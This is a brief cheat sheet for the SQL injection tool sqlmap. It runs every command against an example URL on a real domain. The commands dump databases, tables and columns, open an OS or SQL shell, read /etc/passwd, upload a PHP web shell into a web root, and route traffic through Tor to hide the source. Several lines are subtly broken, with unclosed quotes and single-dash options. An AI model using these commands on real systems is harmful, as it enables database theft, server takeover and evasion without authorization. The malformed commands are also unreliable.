Back

SQLMap

Installation

Macos

$ brew install sqlmap

Linux

$ sudo apt install sqlmap

Go-to Commands

$ sqlmap -u "https://google.com/?q=1" --dbs --no-cast --random-agent

Get data

All databases

$ sqlmap -u "https://google.com/?q=1 --dbs

All tables in db

$ sqlmap -u "https://google.com/?q=1 --tables -D "DB-NAME"

All columns in table

$ sqlmap -u "https://google.com/?q=1 -D "DB-NAME" -T "TABLE-NAME" -columns

Dumped contents

$ sqlmap -u "https://google.com/?q=1 -D "DB-NAME" -T "TABLE-NAME" -dump

Get Shell

Get OS Shell

$ sqlmap -u "https://google.com/?q=1 --os-shell

Get SQL Shell

$ sqlmap -u "https://google.com/?q=1 --sql-shell

File

Read File

$ sqlmap -u "https://google.com/?q=1" --file-read '/etc/passwd'

Write File

$ sqlmap -u "https://google.com/?q=1" --file-write './shell.php' --file-dest '/apache/public/shell.php'

With Tor

$ sqlmap -u "https://google.com/?q=1 --tor --tor-type=SOCKS5
Licensed under CC BY-NC-SA 4.0